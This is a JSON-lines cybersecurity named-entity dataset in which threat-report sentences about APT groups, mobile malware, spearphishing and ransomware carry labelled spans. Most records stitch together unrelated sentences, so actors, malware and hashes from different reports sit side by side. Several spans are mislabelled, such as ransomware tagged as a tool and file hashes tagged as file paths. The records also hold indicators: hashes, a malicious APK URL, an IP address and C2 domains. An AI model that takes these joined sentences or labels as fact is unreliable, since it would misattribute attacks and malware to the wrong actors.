{"text": "As part of their activities , they are known for hijacking DNS settings on Japanese routers that redirect users to malicious IP addresses , creating disguised malicious Android apps that appear as popular apps , stealing Apple ID credentials by creating Apple phishing pages , as well as performing web crypto mining on browsers . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . This time , APT15 opted for a DNS based backdoor : RoyalDNS .", "spans": {"SYSTEM: Android": [[169, 176]], "ORGANIZATION: Apple": [[221, 226], [254, 259]], "THREAT_ACTOR: FIN7": [[331, 335]], "THREAT_ACTOR: APT15": [[483, 488]], "MALWARE: DNS based backdoor": [[501, 519]], "MALWARE: RoyalDNS": [[522, 530]]}, "info": {"id": "cyberner_stix_train_003437", "source": "cyberner_stix_train"}}
{"text": "The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 . If ZxShell successfully connects to the remote host , the function DoHandshake is called . As 2021 ends , one critical theme remains constant within the world of enterprise security ransomware attacks are continuing to rise , yearoveryear , across private and public entities .", "spans": {"MALWARE: ZxShell": [[273, 280]], "ORGANIZATION: private and public entities": [[518, 545]]}, "info": {"id": "cyberner_stix_train_003438", "source": "cyberner_stix_train"}}
{"text": "the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories .", "spans": {"MALWARE: Asacub": [[157, 163]], "MALWARE: CraP2P": [[166, 172]], "TOOL: Locky": [[234, 239]], "TOOL: Dridex": [[244, 250]], "MALWARE: backdoor Trojan": [[383, 398]], "MALWARE: Volgmer": [[401, 408]]}, "info": {"id": "cyberner_stix_train_003439", "source": "cyberner_stix_train"}}
{"text": "Others like transferbot , promptupdate and promptuninstall are meant to help the operator manage the malware . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families . This helped disguise their activities . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user ’s email address and password ) .", "spans": {"TOOL: White Lambert samples": [[196, 217]], "TOOL: White": [[264, 269]], "TOOL: Pink Lambert malware families": [[274, 303]], "MALWARE: malicious JavaScript request": [[381, 409]]}, "info": {"id": "cyberner_stix_train_003440", "source": "cyberner_stix_train"}}
{"text": "The malware contains a list of 209 packages hardcoded in its source code . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East . This could be an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed . However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": {"THREAT_ACTOR: group": [[94, 99]], "VULNERABILITY: reused code associated with the cyber range to develop this malware": [[441, 508]]}, "info": {"id": "cyberner_stix_train_003441", "source": "cyberner_stix_train"}}
{"text": "In addition , it collects identifiers and some data from the device . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) . Ursnif Variant 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 ea7e1650031c92b7377788f05926034e Ursnif Variant 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d 377cd85d8d68fc58976a123aa151c5e0 Ursnif Variant 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 b73cbffea8094cfa18b067d9568c53e7 Ursnif Variant e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 24fe5a6196e32749cd030ab51824cabe Ursnif Variant 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de 589734cb60aa515599c687539c520049 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"THREAT_ACTOR: OceanLotus": [[70, 80]], "THREAT_ACTOR: APT32": [[97, 102]], "THREAT_ACTOR: APT group": [[139, 148]], "MALWARE: Ursnif": [[255, 261], [368, 374], [481, 487], [594, 600], [707, 713]], "FILEPATH: 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0": [[270, 334]], "FILEPATH: ea7e1650031c92b7377788f05926034e": [[335, 367]], "FILEPATH: 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d": [[383, 447]], "FILEPATH: 377cd85d8d68fc58976a123aa151c5e0": [[448, 480]], "FILEPATH: 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889": [[496, 560]], "FILEPATH: b73cbffea8094cfa18b067d9568c53e7": [[561, 593]], "FILEPATH: e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52": [[609, 673]], "FILEPATH: 24fe5a6196e32749cd030ab51824cabe": [[674, 706]], "FILEPATH: 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de": [[722, 786]], "FILEPATH: 589734cb60aa515599c687539c520049": [[787, 819]], "ORGANIZATION: Cisco Talos": [[822, 833]], "TOOL: Foxit PDF Reader": [[970, 986]], "TOOL: Adobe Acrobat": [[1040, 1053]]}, "info": {"id": "cyberner_stix_train_003442", "source": "cyberner_stix_train"}}
{"text": "House Speaker Nancy Pelosi later confirmed that the DCCC had suffered a network compromise .", "spans": {"ORGANIZATION: DCCC": [[52, 56]]}, "info": {"id": "cyberner_stix_train_003443", "source": "cyberner_stix_train"}}
{"text": "CVE-2015-6585 : Hangul Word Processor Vulnerability .", "spans": {"VULNERABILITY: CVE-2015-6585": [[0, 13]], "TOOL: Hangul Word Processor": [[16, 37]]}, "info": {"id": "cyberner_stix_train_003444", "source": "cyberner_stix_train"}}
{"text": "Figure 14 : disabling infected apps auto-update Figure 15 : changing the settings of the update timeout The Ad Displaying Payload Following all of the above , now is the time to take a look into the actual payload that displays ads to the victim . The campaign was active until January 2014 , but during our investigations the C&C servers were shut down . Next , the loader DLL E-TOOL targets the setup.exe file in SysWoW64 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"TOOL: the loader": [[363, 373]], "TOOL: DLL E-TOOL": [[374, 384]], "FILEPATH: setup.exe": [[397, 406]], "SYSTEM: SysWoW64": [[415, 423]], "ORGANIZATION: Malwarebytes": [[426, 438]]}, "info": {"id": "cyberner_stix_train_003445", "source": "cyberner_stix_train"}}
{"text": "As Talos observed at the beginning of 2017 , Group 123 started a campaign corresponding with the new year in 2018 . The Trojan is quite similar to the .NET RocketMan Trojan Obviously and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"ORGANIZATION: Talos": [[3, 8]], "THREAT_ACTOR: Group 123": [[45, 54]], "MALWARE: Trojan": [[120, 126], [166, 172]], "TOOL: .NET": [[151, 155]], "MALWARE: RocketMan": [[156, 165]]}, "info": {"id": "cyberner_stix_train_003446", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , at the time of collection , the C2 domain had been sinkholed by a third party .", "spans": {"TOOL: C2": [[48, 50]]}, "info": {"id": "cyberner_stix_train_003447", "source": "cyberner_stix_train"}}
{"text": "In our research , we focus on the most recent sample , an application dubbed as \" Golden Cup '' , launched just before the start of World Cup 2018 . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years . In this instance it is saved to the C:\\ProgramData directory with a pseudo random name . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": {"MALWARE: Golden Cup": [[82, 92]], "ORGANIZATION: Mandiant": [[149, 157]], "TOOL: POSHSPY": [[179, 186]], "THREAT_ACTOR: APT29": [[232, 237]]}, "info": {"id": "cyberner_stix_train_003448", "source": "cyberner_stix_train"}}
{"text": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank .", "spans": {"ORGANIZATION: Cisco": [[80, 85]], "ORGANIZATION: ESET": [[106, 110]], "THREAT_ACTOR: APT38": [[212, 217]], "MALWARE: DYEPACK": [[228, 235]], "ORGANIZATION: bank": [[394, 398]]}, "info": {"id": "cyberner_stix_train_003449", "source": "cyberner_stix_train"}}
{"text": "Some versions of the Skygofree feature the self-protection ability exclusively for Huawei devices . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity .", "spans": {"MALWARE: Skygofree": [[21, 30]], "ORGANIZATION: Huawei": [[83, 89]], "MALWARE: JavaScript": [[104, 114]], "THREAT_ACTOR: APT41": [[329, 334]]}, "info": {"id": "cyberner_stix_train_003450", "source": "cyberner_stix_train"}}
{"text": "Once connected to the pipe , a user or a program can easily provide information required to execute command ( just as they would normally through a command-line ) .", "spans": {}, "info": {"id": "cyberner_stix_train_003451", "source": "cyberner_stix_train"}}
{"text": "WhatsApp message capture The service com.serenegiant.service.ScreenRecorderService , is invoked by the ScreenRecorderActivity . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . It is worth noting that this email appeared to have been sent from another Taiwanese Government employee , implying that the email was sent from a valid but compromised account . Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": {"SYSTEM: WhatsApp": [[0, 8]], "TOOL: email": [[412, 417], [508, 513]], "ORGANIZATION: Taiwanese Government": [[458, 478]], "MALWARE: TrickBot": [[567, 575]], "SYSTEM: C2": [[627, 629]]}, "info": {"id": "cyberner_stix_train_003452", "source": "cyberner_stix_train"}}
{"text": "A \" Tracking tool '' or an \" Admin tool '' are often cited for these kinds of tools for \" commercial '' or \" enterprise '' usage . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . Though public disclosures resulted in APT12 adaptations , FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels . In fact , this chain also leads to NetSupport RAT .", "spans": {"TOOL: legitimate traffic": [[148, 166]], "THREAT_ACTOR: APT12": [[272, 277], [331, 336]], "ORGANIZATION: FireEye": [[292, 299]], "TOOL: NetSupport RAT": [[443, 457]]}, "info": {"id": "cyberner_stix_train_003453", "source": "cyberner_stix_train"}}
{"text": "PlugX — A remote access tool notable for communications that may contain HTTP headers starting with \" X- \" ( e.g. , \" X-Session : 0 \" ) .", "spans": {"MALWARE: PlugX": [[0, 5]], "TOOL: X-Session": [[118, 127]]}, "info": {"id": "cyberner_stix_train_003454", "source": "cyberner_stix_train"}}
{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "ORGANIZATION: TAA": [[176, 179]], "ORGANIZATION: telecoms operator": [[210, 227]]}, "info": {"id": "cyberner_stix_train_003455", "source": "cyberner_stix_train"}}
{"text": "Doing so executes code checking if the device is manufactured by Xiaomi , or if Xiaomi ’ s fork of Android is running on the device . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always correlate with targeted users or organizations . Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": {"ORGANIZATION: Xiaomi": [[65, 71]], "ORGANIZATION: Xiaomi ’ s": [[80, 90]], "SYSTEM: Android": [[99, 106]], "THREAT_ACTOR: APT41": [[134, 139]], "THREAT_ACTOR: APT28": [[357, 362]]}, "info": {"id": "cyberner_stix_train_003456", "source": "cyberner_stix_train"}}
{"text": "Other cyberespionage groups , including Black Vine and Hidden Lynx , have also used stolen certificates in their campaigns .", "spans": {"THREAT_ACTOR: Black Vine": [[40, 50]], "THREAT_ACTOR: Hidden Lynx": [[55, 66]]}, "info": {"id": "cyberner_stix_train_003457", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , we were unable to get any C2 S-TOOL servers to issue download commands to any samples that we tested in our lab .", "spans": {"TOOL: C2 S-TOOL servers": [[42, 59]]}, "info": {"id": "cyberner_stix_train_003458", "source": "cyberner_stix_train"}}
{"text": "The traffic transits in clear and is therefore potentially exposed to man-in-the-middle attacks : At the same time , null will also bind a local shell on 0.0.0.0:6842 . On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack . Meeting Agenda.pdf : That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": {"TOOL: Nidiran back door": [[359, 376]], "FILEPATH: Meeting Agenda.pdf": [[414, 432]], "MALWARE: BlackSuit": [[475, 484]], "MALWARE: Royal ransomware": [[552, 568]]}, "info": {"id": "cyberner_stix_train_003459", "source": "cyberner_stix_train"}}
{"text": "2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one – appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible . In Operation Sheep’s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . APT12 is a threat group that has been attributed to China .", "spans": {"THREAT_ACTOR: Shun Wang": [[259, 268]], "THREAT_ACTOR: APT12": [[356, 361]]}, "info": {"id": "cyberner_stix_train_003460", "source": "cyberner_stix_train"}}
{"text": "From the outside , they are indistinguishable from the legitimate applications . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version . It is not directly used from msvcrt.dll but is instead copied to another memory chunk before being called . They claim to have compromised the company and are willing to help resolve the issue .", "spans": {"FILEPATH: msvcrt.dll": [[291, 301]]}, "info": {"id": "cyberner_stix_train_003461", "source": "cyberner_stix_train"}}
{"text": "Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts .", "spans": {"THREAT_ACTOR: Suckfly": [[31, 38]], "MALWARE: Nidiran": [[48, 55]]}, "info": {"id": "cyberner_stix_train_003462", "source": "cyberner_stix_train"}}
{"text": "A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped .", "spans": {"MALWARE: Shamoon": [[14, 21]]}, "info": {"id": "cyberner_stix_train_003463", "source": "cyberner_stix_train"}}
{"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"THREAT_ACTOR: attackers": [[574, 583]], "ORGANIZATION: victims who answer": [[593, 611]], "TOOL: Bluetooth": [[842, 851]]}, "info": {"id": "cyberner_stix_train_003464", "source": "cyberner_stix_train"}}
{"text": "How it Works In order to get into the Google Play Store , the malware uses a phased approach which is quite a common practice for malware authors these days . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor . The samples had minor changes , and were presumably changed by the attackers to avoid detection by hash . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": {"SYSTEM: Google Play": [[38, 49]], "THREAT_ACTOR: APT32": [[159, 164]], "TOOL: Cobalt Strike backdoor": [[233, 255]], "THREAT_ACTOR: Threat actors": [[364, 377]], "THREAT_ACTOR: Winnti group": [[387, 399]]}, "info": {"id": "cyberner_stix_train_003465", "source": "cyberner_stix_train"}}
{"text": "As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . As a result , it is already flagged as Bahamut by antivirus engines .", "spans": {"VULNERABILITY: CVE-2017-11882": [[28, 42]], "VULNERABILITY: CVE-2018-0802": [[47, 60]], "TOOL: weaponizer": [[67, 77]], "THREAT_ACTOR: actors": [[126, 132]]}, "info": {"id": "cyberner_stix_train_003466", "source": "cyberner_stix_train"}}
{"text": "Bread has used a few tricks to keep strings in plaintext while preventing basic string matching . In one case in late 2014 , APT5 breached the network of an international telecommunications company . Shutdown Logout , shutdown or restart the target system . Check the flag T as indicator if single stepping .", "spans": {"MALWARE: Bread": [[0, 5]], "ORGANIZATION: international telecommunications company": [[157, 197]]}, "info": {"id": "cyberner_stix_train_003467", "source": "cyberner_stix_train"}}
{"text": "In addition future Trojans could leverage root exploits to make them almost impossible to remove and give malicious actors the ability to hook generic low level API ’ s that are used by all ( banking ) applications , just like the attack vector as has been used on the desktop platform for years . Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway . ZxShell is one sample amongst several tools that Group 72 used within their campaign . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": {"TOOL: RAR": [[364, 367]], "MALWARE: ZxShell": [[426, 433]], "THREAT_ACTOR: Group 72": [[475, 483]]}, "info": {"id": "cyberner_stix_train_003468", "source": "cyberner_stix_train"}}
{"text": "Phone number for administration changeServer : At this point , the malware changes the C2 to a new host , even though the API and communication protocol continues to be the same . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . The malware supports the following capabilities : Terminate specific process、Enumerate processes、Upload file、Download file、Delete file、List folder contents、Enumerate storage volumes、Execute a command、Reverse shell、Take a screenshot . Conducted for commercial or financial purposes , corporate espionage involves", "spans": {"TOOL: DNSMessenger": [[247, 259]], "TOOL: MuddyWater": [[264, 274]]}, "info": {"id": "cyberner_stix_train_003469", "source": "cyberner_stix_train"}}
{"text": "The code above changes the font color to black within the specified cell range and presents the content to the user .", "spans": {}, "info": {"id": "cyberner_stix_train_003470", "source": "cyberner_stix_train"}}
{"text": "Firewalls provide security to make your network less susceptible to attack .", "spans": {"TOOL: Firewalls": [[0, 9]]}, "info": {"id": "cyberner_stix_train_003471", "source": "cyberner_stix_train"}}
{"text": "The pushTAN method has a clear advantage : It improves security by mitigating the risk of SIM swapping attacks and SMS stealers . Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East .", "spans": {"ORGANIZATION: Mandiant": [[147, 155]], "ORGANIZATION: Unit 42": [[299, 306]], "THREAT_ACTOR: actors": [[374, 380]]}, "info": {"id": "cyberner_stix_train_003472", "source": "cyberner_stix_train"}}
{"text": "The macro obtains the document saved to the system from within the document stored as UserForm1.Label1.Caption and will write it to : %TEMP%\\~temp.docm .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: UserForm1.Label1.Caption": [[86, 110]], "FILEPATH: %TEMP%\\~temp.docm": [[134, 151]]}, "info": {"id": "cyberner_stix_train_003473", "source": "cyberner_stix_train"}}
{"text": "However , a white font color is applied to the text to make it appear that the victim must enable macros to access the content .", "spans": {}, "info": {"id": "cyberner_stix_train_003474", "source": "cyberner_stix_train"}}
{"text": "Our intelligence shows “ Agent Smith ” droppers proliferate through third-party app store “ 9Apps ” , a UC team backed store , targeted mostly at Indian ( Hindi ) , Arabic , and Indonesian users . We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers . Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign . Dynamic Resolution During the SolarWinds Compromise , APT29 used dynamic DNS resolution to construct and resolve to randomly - generated subdomains for C2.[12 ]", "spans": {"MALWARE: Agent Smith": [[25, 36]], "SYSTEM: 9Apps": [[92, 97]], "ORGANIZATION: antivirus companies": [[286, 305]], "TOOL: Microsoft Defender": [[332, 350]], "MALWARE: Dexphot": [[452, 459]], "THREAT_ACTOR: SolarWinds Compromise": [[501, 522]], "THREAT_ACTOR: APT29": [[525, 530]]}, "info": {"id": "cyberner_stix_train_003475", "source": "cyberner_stix_train"}}
{"text": "If /sdcard/MemosForNotes was present on the device , the Chrysaor app removes itself from the device . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort . The apex domain was set to redirect to a relevant legitimate site using the Namecheap redirection service , while the subdomain points to the malicious C&C server . None The motives have not yet been definitively determined , but are guessed to be the result of a oneoff attempt to gather intelligence that potentially can be used in further phishing campaigns .", "spans": {"MALWARE: Chrysaor": [[57, 65]], "THREAT_ACTOR: actor": [[107, 112]], "TOOL: Namecheap": [[286, 295]]}, "info": {"id": "cyberner_stix_train_003476", "source": "cyberner_stix_train"}}
{"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet .", "spans": {"TOOL: PingCastle MS17-010": [[71, 90]], "VULNERABILITY: EternalBlue": [[218, 229]], "FILEPATH: winword.exe": [[355, 366]], "FILEPATH: Start-Process": [[385, 398]], "FILEPATH: cmdlet": [[399, 405]]}, "info": {"id": "cyberner_stix_train_003477", "source": "cyberner_stix_train"}}
{"text": "Symantec has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Patchwork": [[38, 47]], "THREAT_ACTOR: Dropping Elephant": [[64, 81]], "MALWARE: MoonWind": [[185, 193]]}, "info": {"id": "cyberner_stix_train_003478", "source": "cyberner_stix_train"}}
{"text": "When the victim opens the attached word document it prompts the user to enable macro content and both the documents ( Uri Terror Report.doc and mha-report.doc ) displayed the same content and contained a Show Document button .", "spans": {"TOOL: attached word document": [[26, 48]], "FILEPATH: Uri Terror Report.doc": [[118, 139]], "FILEPATH: mha-report.doc": [[144, 158]]}, "info": {"id": "cyberner_stix_train_003479", "source": "cyberner_stix_train"}}
{"text": "The ActionScript relies on event listeners to call specific functions when the event “ Event.COMPLETE ” is triggered after successful HTTP requests are issued to the C2 server .", "spans": {"TOOL: ActionScript": [[4, 16]], "FILEPATH: Event.COMPLETE": [[87, 101]], "TOOL: C2": [[166, 168]]}, "info": {"id": "cyberner_stix_train_003480", "source": "cyberner_stix_train"}}
{"text": "CrowdStrike® Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"ORGANIZATION: CrowdStrike® Intelligence": [[0, 25]], "THREAT_ACTOR: PINCHY SPIDER": [[48, 61]], "TOOL: GandCrab ransomware": [[83, 102]], "ORGANIZATION: civil society": [[394, 407]], "ORGANIZATION: diaspora": [[412, 420]]}, "info": {"id": "cyberner_stix_train_003481", "source": "cyberner_stix_train"}}
{"text": "Although at first glance this appears somewhat complex , it is in fact a rather simple , repeated keyboard sequence .", "spans": {}, "info": {"id": "cyberner_stix_train_003482", "source": "cyberner_stix_train"}}
{"text": "The information collected by the malware and the control over the victim 's mobile device allows their operators to perform more complex social engineering attacks . The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . OceanLotus : 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Loader #2 . It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": {"ORGANIZATION: managed IT service providers": [[240, 268]], "ORGANIZATION: MSPs": [[271, 275], [383, 387]], "THREAT_ACTOR: APT10": [[289, 294]], "THREAT_ACTOR: OceanLotus": [[417, 427]], "FILEPATH: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[430, 494]], "ORGANIZATION: Rostelecom - Solar": [[596, 614]], "ORGANIZATION: Russian Ministry of Energy": [[649, 675]], "ORGANIZATION: SPIEF": [[697, 702]]}, "info": {"id": "cyberner_stix_train_003483", "source": "cyberner_stix_train"}}
{"text": "At runtime , the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address . The ZxShell driver starts by acquiring some kernel information and then hooking “ ObReferenceObjectByHandle ” API . UNC4899 's targeting is selective , and they have been observed gaining access to victim networks through JumpCloud .", "spans": {"MALWARE: ZxShell": [[310, 317]], "ORGANIZATION: UNC4899 's targeting": [[422, 442]], "TOOL: JumpCloud": [[528, 537]]}, "info": {"id": "cyberner_stix_train_003484", "source": "cyberner_stix_train"}}
{"text": "A few days later they can cancel the trial and do not need to pay a penny . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user . So , static analysis on the “ 6323 ” file shown as its nature : it is written using Microsoft Visual Studio .NET , therefore easily to reverse . These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": {"THREAT_ACTOR: actor": [[167, 172]], "FILEPATH: 6323": [[280, 284]], "TOOL: Microsoft Visual Studio .NET": [[333, 361]], "MALWARE: COSMICENERGY": [[445, 457]]}, "info": {"id": "cyberner_stix_train_003485", "source": "cyberner_stix_train"}}
{"text": "Ongoing activity While monitoring this particular threat , we found another XLoader variant posing as a pornography app aimed at South Korean users . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 . Note the request number parameter is now 0001: 39e965e000caD60001679C79T.sample-domain.evil . The ransomware is a 64bit executable written in Rust and it recognises the following commandline parameters", "spans": {"MALWARE: XLoader": [[76, 83]], "ORGANIZATION: media organizations": [[228, 247]], "THREAT_ACTOR: APT16": [[291, 296]], "FILEPATH: 39e965e000caD60001679C79T.sample-domain.evil": [[346, 390]], "MALWARE: ransomware": [[397, 407]], "MALWARE: 64bit executable": [[413, 429]], "TOOL: Rust": [[441, 445]]}, "info": {"id": "cyberner_stix_train_003486", "source": "cyberner_stix_train"}}
{"text": "The details of this attribution is explained in a dedicated section below .", "spans": {}, "info": {"id": "cyberner_stix_train_003487", "source": "cyberner_stix_train"}}
{"text": "WebView JavaScript Interface Continuing on the theme of cross-language bridges , Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 . This set of functionality allows the operator complete control of a system . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"MALWARE: Bread": [[81, 86]], "ORGANIZATION: Middle Eastern human rights activist": [[211, 247]], "ORGANIZATION: Astamirov": [[361, 370]]}, "info": {"id": "cyberner_stix_train_003488", "source": "cyberner_stix_train"}}
{"text": "To trick the targeted individual into enabling macros , the attackers deliberately used jumbled-up text as content .", "spans": {}, "info": {"id": "cyberner_stix_train_003489", "source": "cyberner_stix_train"}}
{"text": "and was identified within an archive file ( 4FE7561F63A71CA73C26CB95B28EAEE8 ) with the name “ التفاصيل الكاملة لأغتيال فقهاء.r24 ” .", "spans": {"FILEPATH: 4FE7561F63A71CA73C26CB95B28EAEE8": [[44, 76]], "FILEPATH: التفاصيل الكاملة لأغتيال فقهاء.r24": [[95, 129]]}, "info": {"id": "cyberner_stix_train_003490", "source": "cyberner_stix_train"}}
{"text": "The incident represented a shift in the capabilities and consequences of ICS malware .", "spans": {"TOOL: ICS": [[73, 76]]}, "info": {"id": "cyberner_stix_train_003491", "source": "cyberner_stix_train"}}
{"text": "Next it writes a hardcoded binary from its body to “ msdeltemp.dll ” into the target directory .", "spans": {"FILEPATH: msdeltemp.dll": [[53, 66]]}, "info": {"id": "cyberner_stix_train_003492", "source": "cyberner_stix_train"}}
{"text": "The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"VULNERABILITY: vulnerability": [[19, 32]], "THREAT_ACTOR: Shadow Brokers": [[211, 225]], "ORGANIZATION: Iranian women 's activist": [[315, 340]], "ORGANIZATION: individual": [[346, 356]]}, "info": {"id": "cyberner_stix_train_003493", "source": "cyberner_stix_train"}}
{"text": "Ukrainian officials revealed that the investigation into the compromise of the CEC ’s internal network identified malware traced to APT28 .", "spans": {"ORGANIZATION: CEC": [[79, 82]], "THREAT_ACTOR: APT28": [[132, 137]]}, "info": {"id": "cyberner_stix_train_003494", "source": "cyberner_stix_train"}}
